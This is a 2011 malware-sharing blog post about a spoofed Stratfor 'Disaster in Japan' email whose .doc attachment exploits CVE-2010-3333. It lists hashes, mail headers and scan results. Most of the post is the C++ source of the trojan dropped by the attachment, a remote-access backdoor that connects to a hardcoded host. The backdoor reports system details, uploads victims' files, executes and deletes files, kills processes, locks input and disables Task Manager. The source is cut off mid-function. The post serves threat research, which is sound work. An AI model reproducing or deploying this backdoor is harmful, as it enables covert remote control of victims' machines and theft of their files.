Clicky

Pages

Tuesday, March 15, 2011

Mar 14 CVE-2010-3333 Disaster in Japan: Watch Report from spoofed mail@response.stratfor.com

Common Vulnerabilities and Exposures (CVE)number

CVE-2010-3333
Stack-based buffer overflow in Microsoft Office XP SP3, Office 2003 SP3, Office 2007 SP2, Office 2010, Office 2004 and 2008 for Mac, Office for Mac 2011, and Open XML File Format Converter for Mac allows remote attackers to execute arbitrary code via crafted RTF data, aka "RTF Stack Buffer Overflow Vulnerability

Please read a technical analysis of this vulnerability on the Microsoft Threat Research & Response Blog Targeted attacks against recently addressed Microsoft Office vulnerability (CVE-2010-3333/MS10-087)  29 Dec 2010 12:10 PM

  General File Information

File   Disaster in Japan (Watch Report).doc
MD5 
7b3208b1dc28b2d5f7641aa212e6aabf
SHA1  8a60a2183a044bbeae90f0354acdbf6f6f052925
File size : 62464 bytes
Type:  DOC
Distribution: Email attachment


Download

I did not analyze it but hope you enjoy it. It uses a spoofed address of Stratfor and is low detection.

Original Message



From: STRATFOR [mailto:mail@response.stratfor.com]
Sent: Monday, March 14, 2011 10:03 AM
To: xxxxxxxxxx
Subject: Disaster in Japan: Watch Report

 
Disaster in Japan: Watch Report
Follow the situation in Japan. Click here to view our coverage.

 STRATFOR
221 W. 6th Street, Suite 400
Austin, TX 78701 US
www.stratfor.com

Message Headers

Received: (qmail 9120 invoked from network); 14 Mar 2011 14:02:41 -0000
Received: from msr2.hinet.net (HELO msr2.hinet.net) (168.95.4.102)
  by XXXXXXXXXXXXXXXXXXXX with SMTP; 14 Mar 2011 14:02:41 -0000
Received: from IISVHOST (211-23-62-226.HINET-IP.hinet.net [211.23.62.226])
    by msr2.hinet.net (8.14.2/8.14.2) with SMTP id p2EE2CkD017131
    for XXXXXXXXXXXXXX Mon, 14 Mar 2011 22:02:36 +0800 (CST)
Reply-To: mail@response.stratfor.com
From: "STRATFOR"
To: XXXXXXXXXXXXXXXXXXXXX
Subject: Disaster in Japan: Watch Report
Date: Mon, 14 Mar 2011 06:02:35 -0800
Message-ID:
MIME-Version: 1.0
Content-Type: multipart/mixed;
    boundary="----=_NextPart_11031405531767147346624_000"
X-Priority: 3
X-Mailer: DreamMail 4.3.2.6

Sender

Hostname:    211-23-62-226.hinet-ip.hinet.net
ISP:    CHTD, Chunghwa Telecom Co., Ltd.
Organization:    Lin, Su Lan
Country:    Taiwan
State/Region:    T'ai-pei
City:    Taipei

Automated Scans

1 /43 (2.3%)
http://www.virustotal.com/file-scan/report.html?id=31c0cf6dd66ff3885a3fcb74b60d7592fbd16287012f5d25be58fb9169e9299c-1300144224
Symantec     20101.3.0.103     2011.03.14     Trojan.Mdropper
MD5   : 7b3208b1dc28b2d5f7641aa212e6aabf
 

Analysis

 Payload Analysis kindly offered by  Shpata Skenderbeut
 Disaster in Japan (Watch Report).doc – Payload Analysis

trojan source code is also here - thanks to  Diocyde
 // Proiect_Server.cpp : Defines the entry point for the application.
//

#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#include
#include "resource.h"
#include
#include  
#include

SOCKET conn,connfile;
int Reconnect(void);
UINT Client(LPVOID pParam);
UINT Configure(LPVOID pParam);
DWORD WINAPI StartConn(LPVOID pParam);
DWORD WINAPI FileClient(LPVOID pParam);
HANDLE fcl,fsvr;

HICON hicon;
int GetIps();
BOOL Proc_kill(char *SzName);
char *de_con[100];
unsigned int x;
int TaskManager_Enable_Disable(BOOL bEnableDisable);
CString ProcSpeedRead();


long FAR PASCAL fereastra(HWND hdlg,WORD wmessage,WPARAM wparam,LPARAM lparam);

bool taskman=false;
bool desktop=false;
bool start=false;
bool key=false;
bool mouse=false;

int StartButton_Show_Hide(BOOL bShowHide);
int Clock_Show_Hide(BOOL bShowHide);
int Taskbar_Show_Hide(BOOL bShowHide);
int Desktop_Show_Hide(BOOL bShowHide);
int Key_Block_Unblock(BOOL bBlockUnblock);
int Mouse_Block_Unblock(BOOL bBlockUnblock);

char text[100];
char as[100];

#define    PROGRAM_MANAGER "Program Manager"    // Program manager window name
#define    TASKBAR         "Shell_TrayWnd"        // Taskbar class name
#define    ID_STARTBUTTON  0x130                // Start button ID
#define    ID_TRAY         0x12F                // System tray ID
#define    ID_CLOCK        0x12F                // System clock ID

HINSTANCE    hInst;        // Instance handle
HHOOK        hHook;        // Mouse hook
HHOOK        hHookK;        // Keyboard hook
HHOOK       hHookM;


#define WH_MOUSE_LL 14
#define WH_KEYBOARD_LL     13




typedef struct KBDLLHOOKSTRUCT {
    DWORD   vkCode;
    DWORD   scanCode;
    DWORD   flags;
    DWORD   time;
    DWORD   dwExtraInfo;
} KBDLLHOOKSTRUCT, FAR *LPKBDLLHOOKSTRUCT, *PKBDLLHOOKSTRUCT;

typedef struct tagMSLLHOOKSTRUCT {
    POINT     pt;
    DWORD     mouseData;
    DWORD     flags;
    DWORD     time;
    ULONG dwExtraInfo;
} MSLLHOOKSTRUCT, *PMSLLHOOKSTRUCT;


LRESULT CALLBACK LowLevelMouseHookProc(int nCode, WORD wParam, DWORD lParam)
{

    PMSLLHOOKSTRUCT p = (PMSLLHOOKSTRUCT)lParam;
    HWND hWnd = WindowFromPoint(p->pt);

    if(nCode >= 0)
    {
        if ((wParam == WM_LBUTTONDOWN || wParam == WM_RBUTTONDOWN) && (hWnd == GetDesktopWindow()||hWnd== FindWindow("Shell_TrayWnd", NULL))/* && p->pt.y>0*/)
        {
        return 1;
        }
      
    }

    return CallNextHookEx(hHook, nCode, wParam, lParam);
}


LRESULT CALLBACK LowLevelMouseHookProcB(int nCode, WORD wParam, DWORD lParam)
{

    PMSLLHOOKSTRUCT p = (PMSLLHOOKSTRUCT)lParam;
if(nCode >= 0)
    {
        if ((wParam == WM_LBUTTONDOWN || wParam == WM_RBUTTONDOWN)  && p->pt.y>0)
        {
        return 1;
        }
      
    }

    return CallNextHookEx(hHook, nCode, wParam, lParam);
}




LRESULT CALLBACK LowLevelKeyBoardHookProc(int nCode, WORD wParam, DWORD lParam)
{
if (nCode >=0)
return 1;

  return CallNextHookEx(hHook, nCode, wParam, lParam);
}

LRESULT CALLBACK MouseHookProc(int nCode, WORD wParam, DWORD lParam)
{

    if(nCode >= 0)
    {
        if (wParam == WM_LBUTTONDBLCLK)
        {
            if (((MOUSEHOOKSTRUCT *)lParam)->hwnd == GetDesktopWindow())
            {
                return 1;
            }
        }
    }

    return CallNextHookEx(hHook, nCode, wParam, lParam);
}



int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{

InitCommonControls();
hInst=hInstance;
    hicon=(HICON)LoadImage(hInstance,MAKEINTRESOURCE(IDI_ICON1),
                                    IMAGE_ICON, GetSystemMetrics(SM_CXSMICON),
                                    GetSystemMetrics(SM_CYSMICON),LR_DEFAULTCOLOR);
    x=0;


AfxBeginThread(Configure,0);


HKEY Regentry;
DWORD dispos,dwSize,dwType;
char primul[1024];




RegCreateKeyEx(HKEY_LOCAL_MACHINE,"Software\\RemoteHost",0,NULL,REG_OPTION_NON_VOLATILE ,  KEY_CREATE_SUB_KEY | KEY_ALL_ACCESS|KEY_QUERY_VALUE,NULL,&Regentry,&dispos);
RegQueryValueEx(Regentry, "host", NULL, &dwType, (unsigned char*)&primul, &dwSize);
if(RegQueryValueEx(Regentry,"host", NULL, &dwType, (unsigned char*)&primul, &dwSize)!=ERROR_SUCCESS)
{
char host[100];
strcpy(host,"127.0.0.1");
RegSetValueEx(Regentry,"host",NULL,REG_SZ,(unsigned char*)&host,strlen(host)+1);
RegCloseKey(Regentry);
}



again:

GetIps();

    Sleep(100);

    WSADATA wsaData;
    struct hostent *hp;
    unsigned int addr;
    struct sockaddr_in server;
    int wsaret=WSAStartup(0x101,&wsaData);

    if(wsaret)  
        return 0;


strcpy(text,as);

Sleep(100);


    conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  
    if(conn==INVALID_SOCKET)
        goto aici;

   

    if(inet_addr(/*de_con[i]*/text)==INADDR_NONE)
    {
        hp=gethostbyname(/*de_con[i]*/text);
    }
    else
    {
        addr=inet_addr(/*de_con[i]*/text);
        hp=gethostbyaddr((char*)&addr,sizeof(addr),AF_INET);
    }

    if(hp==NULL)
    {
        closesocket(conn);
    goto aici;
    }
  
    server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
    server.sin_family=AF_INET;
    server.sin_port=htons(1100);
  
    if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
    {
aici:
        closesocket(conn);
        goto again;
      
    }
  

AfxBeginThread(Client,(LPVOID)conn);

while (1)
{
Sleep(1);
}



    return 0;
}

DWORD WINAPI FileClient(LPVOID pParam)
{
connfile=(SOCKET)pParam;



char buff[1024];

send(connfile,"Gabby",6,0);
recv(connfile,buff,sizeof(buff),0);



char text[100];
struct hostent *h;

gethostname(text,sizeof(text));
h=gethostbyname(text);
char * ip;
ip=inet_ntoa(*((struct in_addr *)h->h_addr));
char detr[1024];
strcpy(detr,text);
strcat(detr," ");
strcat(detr,ip);
send(connfile,detr,strlen(detr),0);

int n;

while (1)
{

ZeroMemory(buff,sizeof(char [1024]));      
n=recv(connfile,buff,512,0);

if ((n==SOCKET_ERROR)||(n==0))
reset: ExitThread(0);

if ((StrStrI(buff,"delete file")!=NULL))
{

char comanda[1024];
Sleep(50);
n=send(connfile,"OK",3,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
strcpy(comanda,buff);

n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

char *host1;
char host[1024];
if(!(host1=strrchr(comanda,'@')))
strcpy(host,comanda);
else
strcpy(host,host1+1);  

if (DeleteFile(host)!=0)
{
n=send(connfile,"success",8,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(connfile,"nosuccess",8,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}

}

else
if ((StrStrI(buff,"execute file")!=NULL))
{

char comanda[1024];
Sleep(50);
n=send(connfile,"OK",3,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
strcpy(comanda,buff);

n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

char *host1;
char host[1024];
if(!(host1=strrchr(comanda,'@')))
strcpy(host,comanda);
else
strcpy(host,host1+1);  

if (((int)ShellExecute(NULL,"open",host,NULL,NULL,SW_SHOW))>32)
{
n=send(connfile,"success",8,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(connfile,"nosuccess",8,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}

}
else

if ((StrStrI(buff,"check for file")!=NULL))
{

char comanda[1024];
Sleep(50);
n=send(connfile,"OK",3,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
strcpy(comanda,buff);
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

char *host1;
char host[1024];
if(!(host1=strrchr(comanda,'@')))
strcpy(host,comanda);
else
strcpy(host,host1+1);  

DWORD attrb;
attrb=GetFileAttributes(host);
if ((attrb==FILE_ATTRIBUTE_DIRECTORY)||(attrb==-1)||(attrb==17))
{
    Sleep(30);
    n=send(connfile,"unavalaible",11,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}

else
{
Sleep(30);
n=send(connfile,"file ok",8,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;



CFile f;
f.Open(host,CFile::modeRead);

DWORD size;
size=f.GetLength();
_itoa(size,buff,10);
Sleep(5);
n=send(connfile,buff,strlen(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;


int y;
char buf[2048];
Sleep(100);
while (true)
{
  
y=f.Read(buf,1024);
//Sleep(1);
n=send(connfile,buf,y,0);
if ((n==SOCKET_ERROR)||    (n==0))
{
Sleep(50);
n=send(connfile,"file ready",11,0);
goto reset;
}
ZeroMemory(buff,sizeof(buff));
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0))
{
n=send(connfile,"file ready",11,0);
goto reset;
}
if (strcmp(buff,"break")==0)
{
goto rename;
}
if (y<1024) break;
}


Sleep(500);
n=send(connfile,"file ready",11,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

rename:
int g;
g=0;
CString nume;
nume=f.GetFileName();

rec:
ZeroMemory(buff,sizeof(buff));
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
if (strcmp(buff,"name@of@file")!=0)
{
n=send(connfile,"resend",7,0);
g++;
goto rec;
}
else
if (g!=0)
n=send(connfile,"get ready",10,0);
else goto low;
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
low:
ZeroMemory(buff,sizeof(buff));
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;


Sleep(10);
n=send(connfile,nume.GetBuffer(sizeof(nume)),strlen(nume.GetBuffer(sizeof(nume))),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;



f.Close();
Sleep(1000);
}

}
else

if ((StrStrI(buff,"files send")!=NULL))
{

  
Sleep(50);
char comanda[1024];
strcpy(comanda,buff);
n=send(connfile,"OK",3,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

char *host1;
char host[1024];
if(!(host1=strrchr(comanda,'@')))
strcpy(host,comanda);
else
strcpy(host,host1+1);  

char path[1024];
strcpy(path,host);

if(!PathFileExists(host))
{
    Sleep(100);
        send(connfile,"done",5,0);
}
else
{
    HANDLE hf;
    WIN32_FIND_DATA fd;
    strcat(host,"*.*");

    hf=FindFirstFile(host,&fd);
    char tr[1024];
    strcpy(tr,path);
    strcat(tr,fd.cFileName);
    Sleep(50);
n=send(connfile,tr,strlen(tr),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

while(FindNextFile(hf,&fd))
{
strcpy(tr,path);
strcat(tr,fd.cFileName);
Sleep(50);
n=send(connfile,tr,strlen(tr),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(connfile,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
Sleep(50);
send(connfile,"done",5,0);

}

}
}
return 0;
}

UINT Client(LPVOID pParam)
{
    conn=(SOCKET)pParam;
  


char buff[1024];


            send(conn,"Gabby",6,0);
            recv(conn,buff,sizeof(buff),0);


    char text[100];
    struct hostent *h;

gethostname(text,sizeof(text));
h=gethostbyname(text);
char * ip;
ip=inet_ntoa(*((struct in_addr *)h->h_addr));

char detr[1024];
strcpy(detr,text);
strcat(detr," ");
strcat(detr,ip);
recv(conn,buff,sizeof(buff),0);
send(conn,detr,strlen(detr),0);


int n;

while (1)
{

ZeroMemory(buff,sizeof(char [1024]));      
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||(n==0))
{
reset:
char serv[1024];
GetModuleFileName(NULL,serv,sizeof(serv));
ShellExecute(NULL,"open",serv,NULL,NULL,SW_SHOW);
//MessageBox(NULL,"There is a problem with the server\nAnother server was started\nPresa ny key to terminate the obsolete server","Gabby",MB_ICONWARNING);
_exit(0);
return 0;
}


if (strcmp(buff,"Client Ready")==0)
{
MessageBox(NULL,"Mesaj de la client. Totul e Ok","Gabby",MB_OK);
n=send(conn,"Gabby",6,0);
if ((n==SOCKET_ERROR)||(n==0)) goto reset;
}
      
if (strcmp(buff,"ping")==0)
{
Sleep(5);
n=send(conn,"pong",5,0);
}
if ((n==SOCKET_ERROR)||(n==0)) goto reset;

if ((StrStrI(buff,"files")!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
fsvr=CreateThread(NULL,0,StartConn,(LPVOID)text,0,0);
}

if ((StrStrI(buff,"getstatus")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
n=send(conn,"OK",3,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;



Sleep(50);
if (mouse)
{
n=send(conn,"mouse locked",15,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(conn,"mouse unlocked",17,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}



Sleep(50);
if (key)
{
n=send(conn,"keyboard locked",15,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(conn,"keyboard unlocked",17,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


Sleep(50);
if (desktop)
{
n=send(conn,"desktop locked",15,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(conn,"desktop unlocked",17,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


Sleep(50);
if (start)
{
n=send(conn,"start locked",13,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(conn,"start unlocked",15,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


Sleep(50);
if (taskman)
{
n=send(conn,"taskmanager locked",19,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
n=send(conn,"taskmanager unlocked",21,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}

Sleep(50);
{
n=send(conn,ip,strlen(ip),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}

char szmodname[1000];
GetModuleFileName(0,szmodname,sizeof(szmodname));
Sleep(50);
n=send(conn,szmodname,strlen(szmodname),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

char user[1000];
DWORD siz;
siz=1000;
GetUserName(user,&siz);
Sleep(50);
n=send(conn,user,strlen(user),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;


int k;
k=0;
char drives[5];
int drive;          
char drivess[1024];
strcpy(drivess,"Drives on computer: ");

    for(drive = 3; drive <= 26; drive++ )
            if( !_chdrive( drive ) )
            {
                drives[k]=(char) drive + 'A' -1;
                k=k+1;
                drives[k] = '\0';
        }

int c;
for(c=0;c
        {
        char cale[3];
            cale[0]=drives[c];
            cale[1]=':';
              
            cale[2]='\0';
            strcat(drivess,cale);
            strcat(drivess,"\n");

}          
Sleep(50);
n=send(conn,drivess,strlen(drivess),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;


CString speed=ProcSpeedRead();
Sleep(50);
n=send(conn,speed.GetBuffer(sizeof(speed)),strlen(speed.GetBuffer(sizeof(speed))),0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
n=recv(conn,buff,512,0);
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;



}

if ((StrStrI(buff,"lulmouse")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

    Sleep(50);
send(conn,"OK",3,0);

int x=Mouse_Block_Unblock(mouse);

if (x==1)
{
    Sleep(50);
    n=send(conn,"ERROR_SUCCESS",14,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
    Sleep(50);
    n=send(conn,"ERROR",6,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


if (mouse==true)
mouse=false;
 else (mouse=true);
}


if ((StrStrI(buff,"lulkey")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

    Sleep(50);
send(conn,"OK",3,0);

int x=Key_Block_Unblock(key);

if (x==1)
{
    Sleep(50);
    n=send(conn,"ERROR_SUCCESS",14,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
    Sleep(50);
    n=send(conn,"ERROR",6,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


if (key==true)
key=false;
 else (key=true);
}


if ((StrStrI(buff,"lulstart")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
Proc_kill("taskmgr");

int x=StartButton_Show_Hide(start);
int y=Taskbar_Show_Hide(start);

if ((x==1)&&(y==1))
{
    Sleep(50);
    n=send(conn,"ERROR_SUCCESS",14,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
    Sleep(50);
    n=send(conn,"ERROR",6,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


if (start==true)
start=false;
 else (start=true);
}


if ((StrStrI(buff,"luldesktop")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
Proc_kill("taskmgr");

int x=Desktop_Show_Hide(desktop);

if ((x!=0))
{
    Sleep(50);
    n=send(conn,"ERROR_SUCCESS",14,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
    Sleep(50);
    n=send(conn,"ERROR",6,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


if (desktop==true)
desktop=false;
 else (desktop=true);
}


if ((StrStrI(buff,"killserver")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
Sleep(50);
n=send(conn,"ERROR_SUCCESS",14,0);
_exit(0);
}


if ((StrStrI(buff,"restartserver")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
Sleep(50);
n=send(conn,"ERROR_SUCCESS",14,0);
closesocket(conn);
goto reset;
}

if ((StrStrI(buff,"lultask")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{

Sleep(50);
send(conn,"OK",3,0);
Proc_kill("taskmgr");
if (TaskManager_Enable_Disable(taskman)==ERROR_SUCCESS)
{
    Sleep(50);
    n=send(conn,"ERROR_SUCCESS",14,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}
else
{
    Sleep(50);
    n=send(conn,"ERROR",6,0);
    if ((n==SOCKET_ERROR)||    (n==0)) goto reset;
}


if (taskman==true)
taskman=false;
 else (taskman=true);
}

if ((StrStrI(buff,"kill proc")!=NULL)&&    (StrStrI(buff,ip)!=NULL))
{
Sleep(50);
send(conn,"OK",3,0);
char *host1;
char host[1024];
if(!(host1=strrchr(buff,' ')))
strcpy(host,buff);
else
strcpy(host,host1+1);  
Sleep(50);
if(Proc_kill(host)==TRUE)
send(conn,"Process Killed Succesfully",32,0);
else
send(conn,"Process Not Killed Succesfully",36,0);
}

if ((StrStrI(buff,"send processes")!=NULL)&&(StrStrI(buff,ip)!=NULL))
        {
Sleep(10);
n=send(conn,"OK",3,0);      
if ((n==SOCKET_ERROR)||    (n==0)) goto reset;

    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;
    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,NULL);
    pe32.dwSize = sizeof(PROCESSENTRY32);

    if (!Process32First(hProcessSnap, &pe32))
    {
        CloseHandle(hProcessSnap);
        goto end;
    }

    do
{
Sleep(5);
n=send(conn,pe32.szExeFile,strlen(pe32.szExeFile),0);  
if ((n==SOCKET_ERROR)||(n==0)) goto reset;
n=    recv(conn,buff,sizeof(buff),0);
if ((n==SOCKET_ERROR)||(n==0)) goto reset;
}
while (Process32Next(hProcessSnap, &pe32));

end:
CloseHandle(hProcessSnap);
Sleep(10);
n=    send(conn,"done",5,0);
if ((n==SOCKET_ERROR)||(n==0)) goto reset;
}

}
return 0;

}


int Reconnect(void)
{
  
again:

        WSADATA wsaData;
    struct hostent *hp;
    unsigned int addr;
    struct sockaddr_in server;
    int wsaret=WSAStartup(0x101,&wsaData);

    if(wsaret)  
        return 0;

    conn=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  
    if(conn==INVALID_SOCKET)
        return 0;

    char text[100];
    strcpy(text,"169.254.35.92");

    if(inet_addr(text)==INADDR_NONE)
    {
        hp=gethostbyname(text);
    }
    else
    {
        addr=inet_addr(text);
        hp=gethostbyaddr((char*)&addr,sizeof(addr),AF_INET);
    }

    if(hp==NULL)
    {
        closesocket(conn);
        return 0;
    }
  
    server.sin_addr.s_addr=*((unsigned long*)hp->h_addr);
    server.sin_family=AF_INET;
    server.sin_port=htons(1100);
  
    if(connect(conn,(struct sockaddr*)&server,sizeof(server)))
    {
      
        closesocket(conn);
        goto again;
        return 0;  
    }
else
{

  
    return 1;
}

AfxBeginThread(Client,(LPVOID)conn);
return 0;
}




BOOL Proc_kill(char *SzName)
{

  
    HANDLE hProcessSnap;
    PROCESSENTRY32 pe32;

  

    hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);

pe32.dwSize = sizeof(PROCESSENTRY32);

if (!Process32First(hProcessSnap, &pe32))

    {
        CloseHandle(hProcessSnap);
        return 0;
    }

    HANDLE hProcess;
    DWORD lpExitCode;


    do
    {
        if ( strcmp(pe32.szExeFile,SzName)==0)
        {
  
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);
    GetExitCodeProcess(hProcess, &lpExitCode );
        if(    TerminateProcess(hProcess,lpExitCode)==0)
            return 0;
        else
            return TRUE;
        }
    }

while (Process32Next(hProcessSnap, &pe32));

        CloseHandle(hProcessSnap);
return 0;  
}








int GetIps()
{

CString strTemp;
struct hostent *host;
struct in_addr *ptr; // To retrieve the IP Address

DWORD dwScope = RESOURCE_CONTEXT;
NETRESOURCE *NetResource = NULL;
HANDLE hEnum;
WNetOpenEnum( dwScope, NULL, NULL,
             NULL, &hEnum );

WSADATA wsaData;
WSAStartup(MAKEWORD(1,1),&wsaData);

if ( hEnum )
{
    DWORD Count = 0xFFFFFFFF;
    DWORD BufferSize = 2048;
    LPVOID Buffer = new char[2048];
    WNetEnumResource( hEnum, &Count,
        Buffer, &BufferSize );
    NetResource = (NETRESOURCE*)Buffer;

    char szHostName[200];
    unsigned int i;



GetModuleFileName(NULL,as,sizeof(as));

HKEY Regentry ;
DWORD dispos,dwSize,dwType;

RegCreateKeyEx(HKEY_LOCAL_MACHINE,"Software\\RemoteHost",0,NULL,REG_OPTION_NON_VOLATILE ,  KEY_CREATE_SUB_KEY | KEY_ALL_ACCESS|KEY_QUERY_VALUE,NULL,&Regentry,&dispos);
if (Regentry==NULL)
goto papa;

RegQueryValueEx(Regentry,"host" , NULL, &dwType, (unsigned char*)&as, &dwSize);
RegQueryValueEx(Regentry,"host" , NULL, &dwType, (unsigned char*)&as, &dwSize);

char *host1;
host1= _strupr( _strdup( as ) );
 


      

  


    for ( i = 0; i < BufferSize/sizeof(NETRESOURCE); i++, NetResource++ )
    {
 if ( NetResource->dwUsage ==RESOURCEUSAGE_CONTAINER && NetResource->dwType == RESOURCETYPE_ANY )
        {
            if ( NetResource->lpRemoteName )
            {
                CString strFullName =
                    NetResource->lpRemoteName;
                if ( 0 ==
                    strFullName.Left(2).Compare("\\\\") ) 
                    strFullName =
                        strFullName.Right(
                            strFullName.GetLength()-2);

                gethostname( szHostName, strlen( szHostName ) );
                host = gethostbyname(strFullName);

                if(host == NULL) continue;
                ptr = (struct in_addr *)
                    host->h_addr_list[0];                  


              
                int a = ptr->S_un.S_un_b.s_b1;
                int b = ptr->S_un.S_un_b.s_b2;
                int c = ptr->S_un.S_un_b.s_b3;
                int d = ptr->S_un.S_un_b.s_b4;

              
                strTemp.Format("%d.%d.%d.%d",a,b,c,d);
              
                if(strcmp(strFullName,as)==0)
                {
                strcpy(as,strTemp.GetBuffer(sizeof(strTemp)));
                }

              
              
            }
        }
    }
  delete Buffer;
 WNetCloseEnum( hEnum );
}
papa:
WSACleanup();
return 1;
}







int TaskManager_Enable_Disable(BOOL bEnableDisable)
{
    #define KEY_DISABLETASKMGR  "Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"
    #define VAL_DISABLETASKMGR  "DisableTaskMgr"

    HKEY    hKey;
    DWORD   val;
    LONG    r;

    if (RegOpenKey(HKEY_CURRENT_USER, KEY_DISABLETASKMGR, &hKey) != ERROR_SUCCESS)
        if (RegCreateKey(HKEY_CURRENT_USER, KEY_DISABLETASKMGR, &hKey) != ERROR_SUCCESS)
            return 0;

    if (bEnableDisable) // Enable
    {
        r = RegDeleteValue(hKey, VAL_DISABLETASKMGR);
    }
    else                // Disable
    {
        val = 1;
